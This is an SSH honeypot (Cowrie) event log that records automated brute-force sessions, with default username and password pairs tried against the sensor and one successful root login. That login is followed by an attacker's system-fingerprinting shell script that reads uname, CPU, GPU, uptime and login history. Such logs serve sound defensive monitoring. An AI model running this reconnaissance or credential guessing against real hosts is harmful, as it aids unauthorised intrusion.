{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:40.006968Z","src_ip":"212.227.125.160","session":"e0270f917380"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace","message":"login attempt [dspace/dspace] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:40.244207Z","src_ip":"212.227.125.160","session":"e0270f917380"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:41.298480Z","src_ip":"212.227.125.160","session":"e0270f917380"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33610,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc865e6a02a","protocol":"ssh","message":"New connection: 83.168.105.65:33610 (1.2.3.4:22) [session: adc865e6a02a]","sensor":"my-vps","timestamp":"2025-08-26T11:52:43.065230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:43.065994Z","src_ip":"83.168.105.65","session":"adc865e6a02a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:43.102840Z","src_ip":"83.168.105.65","session":"adc865e6a02a"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:43.231879Z","src_ip":"83.168.105.65","session":"adc865e6a02a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:44.270388Z","src_ip":"83.168.105.65","session":"adc865e6a02a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38262,"dst_ip":"1.2.3.4","dst_port":22,"session":"72657a9f9e4a","protocol":"ssh","message":"New connection: 212.227.125.160:38262 (1.2.3.4:22) [session: 72657a9f9e4a]","sensor":"my-vps","timestamp":"2025-08-26T11:52:45.415437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:45.416077Z","src_ip":"212.227.125.160","session":"72657a9f9e4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:45.480193Z","src_ip":"212.227.125.160","session":"72657a9f9e4a"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:45.704723Z","src_ip":"212.227.125.160","session":"72657a9f9e4a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:46.845260Z","src_ip":"212.227.125.160","session":"72657a9f9e4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34782,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b0ff0125487","protocol":"ssh","message":"New connection: 212.227.125.160:34782 (1.2.3.4:22) [session: 6b0ff0125487]","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.300576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.302788Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.351073Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.566408Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:52:48.797211Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.797920Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.798836Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.799876Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.801455Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.802133Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.802891Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.804401Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.804870Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.805375Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.806017Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.806792Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.807225Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.869734Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.870746Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:48.871667Z","src_ip":"212.227.125.160","session":"6b0ff0125487"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39030,"dst_ip":"1.2.3.4","dst_port":22,"session":"b331164ea5c3","protocol":"ssh","message":"New connection: 212.227.125.160:39030 (1.2.3.4:22) [session: b331164ea5c3]","sensor":"my-vps","timestamp":"2025-08-26T11:52:51.276626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:51.277437Z","src_ip":"212.227.125.160","session":"b331164ea5c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:51.329175Z","src_ip":"212.227.125.160","session":"b331164ea5c3"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"rocky","message":"login attempt [rocky/rocky] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:51.531235Z","src_ip":"212.227.125.160","session":"b331164ea5c3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:52:52.583793Z","src_ip":"212.227.125.160","session":"b331164ea5c3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38332,"dst_ip":"1.2.3.4","dst_port":22,"session":"241c7594f1e5","protocol":"ssh","message":"New connection: 196.251.86.249:38332 (1.2.3.4:22) [session: 241c7594f1e5]","sensor":"my-vps","timestamp":"2025-08-26T11:52:54.841202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:55.389167Z","src_ip":"196.251.86.249","session":"241c7594f1e5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:52:55.389810Z","src_ip":"196.251.86.249","session":"241c7594f1e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39798,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c5db9c8a21d","protocol":"ssh","message":"New connection: 212.227.125.160:39798 (1.2.3.4:22) [session: 9c5db9c8a21d]","sensor":"my-vps","timestamp":"2025-08-26T11:52:56.937222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:56.938783Z","src_ip":"212.227.125.160","session":"9c5db9c8a21d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:52:56.989610Z","src_ip":"212.227.125.160","session":"9c5db9c8a21d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:57.162291Z","src_ip":"212.227.125.160","session":"9c5db9c8a21d"}
{"eventid":"cowrie.login.failed","username":"git","password":"qwer1234","message":"login attempt [git/qwer1234] failed","sensor":"my-vps","timestamp":"2025-08-26T11:52:57.887928Z","src_ip":"196.251.86.249","session":"241c7594f1e5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":42824,"dst_ip":"1.2.3.4","dst_port":22,"session":"163696700f65","protocol":"ssh","message":"New connection: 83.168.105.65:42824 (1.2.3.4:22) [session: 163696700f65]","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.111551Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:52:58.112343Z","src_ip":"83.168.105.65","session":"163696700f65"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh